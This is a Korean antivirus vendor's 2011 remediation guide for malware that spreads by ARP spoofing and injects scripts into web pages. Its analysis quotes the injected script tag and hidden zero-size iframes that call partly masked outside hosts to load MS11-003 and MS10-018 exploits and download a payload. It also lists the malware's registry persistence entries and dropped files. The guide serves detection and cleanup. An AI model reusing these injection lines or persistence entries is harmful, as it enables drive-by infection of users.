본문 바로가기
조치 가이드

ARP Spoofing 유발 악성코드 조치 가이드

by 알 수 없는 사용자 2011. 3. 9.
1. 개요
최근 ARP Spoofing 증상을 발생시키는 형태의 악성코드가 확인되었으며, 이로 인한 피해 사례가 다수 발생되고 있습니다.


2. 악성코드 감염 형태
최초 감염 경로는 불분명하나, 감염된 후에는 ARP Spoofing 을 통해 동일 네트워크 대역에 사용중인 시스템 확인 및 해당 시스템들의 ARP Table을 변조하여 웹페이지에 스크립트를 삽입, 악성코드를 전파합니다.

1) ARP Spoofing 공격 형태
악성코드에 감염된 시스템의 경우 아래와 같이 동일 네트워크 대역(C 클래스)를 통해 공격 가능한 시스템을 스캔합니다.

[그림 1] 동일 네트워크 사용중인 시스템 스캔


이후 [그림 2]와 같이 공격 가능한 시스템 리스트를 ARP Table 에 static 으로 적용합니다.

[그림 2] 감염된 시스템에서 리스트화된 ARP 테이블


그리고 리스트에 해당하는 시스템들에 대해서 지속적인 ARP 패킷을 발생하여 ARP Table을 변조하게 됩니다.

[그림 3] ARP 변조를 위한 패킷 발생


위 공격으로 인해 지속적인 ARP 패킷을 받는 시스템의 경우, 아래와 같이 웹페이지 접속시 악성 스크립트가 삽입 및 실행되어 관련 윈도우 취약점이 존재하거나, V3 제품이 설치되지 않으신 경우 악성코드에 감염될 수 있습니다.

[그림 4] 웹페이지에 삽입되는 스크립트



2) 감염 스크립트
ARP Spoofing 악성코드에 감염된 시스템에 의해, 웹사이트 접속시 아래와 같이 스크립트가 삽입됩니다.

<script src=http://**.**.**:82/images/nnnnnnnnnnnnnn/ar.js></script>
[표 1] 삽입되는 스크립트


해당 스크립트에 포함된 iframe 으로 연결되면, 시스템에 존재하는 윈도우 취약점(MS10-018, MS11-003)을 통해 악성코드에 감염됩니다.
<iframe src=http://74.**.***.**:82/shop/main/blank2.html width=0 height=0></iframe> // IE7, MS11-003
<iframe src=http://74.**.***.**:82/shop/main/blank1.html width=0 height=0></iframe> // IE8, MS11-003
<iframe src=http://74.**.***.**:82/shop/main/blank3.html width=0 height=0></iframe> // IE6, MS10-018
[표 2] 삽입되는 스크립트


삽입된 iframe에 의해 악성 스크립트가 실행되면, 아래와 같이 최종 실행파일이 다운로드되어 실행됩니다.
http://**.**.**:82/imes/icon/scvhost.txt
[표 3] 최종 다운로드되는 파일 경로


[그림 5], [그림 6]은 iframe 태그를 통해 연결되는 난독화된 스크립트 코드의 일부입니다.

[그림 5] MS11-003 취약점 이용, blank1.html

 
[그림 6] MS10-018 취약점 이용, blank3.html



3. 악성코드 감염 증상

해당 악성코드는 온라인 게임핵류 전파가 주 목적으로 보이며, ARP Spoofing 을 이용해 다수의 시스템에 전파하게 됩니다. (이 문서에서는 ARP 유발과 관련된 일부 파일들에 대해서만 작성하겠습니다.)

그리고 감염이 되면 아래와 같은 파일들을 생성합니다.

C:\WINDOWS\Temp\dllhost.exe // ARP 유발 악성코드
C:\WINDOWS\Temp\conime.exe
C:\WINDOWS\Tasks\[숫자]\svchost.exe
C:\WINDOWS\MicrosoftManagementConsole_0.dll
[표 4] 주요 생성 파일


시스템 재시작시 동작할 수 있도록 아래와 같이 레지스트리에 등록합니다.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit                                                                                  
"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\000c00290eb07a0170\svchost.exe"

HKLM\SYSTEM \ControlSet001\Services\[서비스명]\Parameters\ServiceDll                                                                                         
"C:\WINDOWS\MicrosoftManagementConsole_0.dll" 
[표 5] 레지스트리 등록값


추가적으로, 일부 시스템에서 감염시 윈도우 정상 파일인 userinit.exe 파일을 악성코드로 교체하는 증상이 발견되었습니다.
C:\WINDOWS\System32\userinit.exe
[표 6] 악성코드로 교체되는 파일



4. V3 진단현황
현재 V3 제품에서는 아래와 같은 진단명으로 진단을 하고 있으니, 엔진을 최신버전으로 업데이트하신 후 정밀 검사 및 치료를 진행해 보시기 바랍니다.

Win32/MalPackedC.suspicious (2011.03.03.00)
Win-Trojan/Agent.64512.GG (2011.03.04.00)
Dropper/Agent.63488.AD (2011.03.06.02)
Win-Trojan/Agent.11997796 (2011.03.08.05)
Win-Trojan/Agent.95853156 (2011.03.08.00)
Win-Trojan/Agent.11998308 (2011.03.08.05)
Win-Trojan/Agent.95853156.B (2011.03.08.05)
Win-Trojan/Agent.24064.XE (2011.03.08.01)
Win-Trojan/Downloader.25600.IM (2011.03.09.00)
Trojan/Win32.OnlineGameHack
[표 7] V3 진단 리스트


만일, 해당 악성코드에 감염되어 V3 제품이 정상적으로 동작하지 않을 경우 아래의 방법으로 조치하시기 바랍니다.

1) 아래의 ARP spoofing 악성코드 전용백신을 다운로드 받아, 진단/치료합니다.
http://www.ahnlab.com/kr/site/download/vacc/downFile.do?file_name=v3kill_ts.exe

2) 시스템을 재부팅 후, V3 제품을 최신 엔진으로 업데이트 및 시스템 전체 검사를 수행합니다.



댓글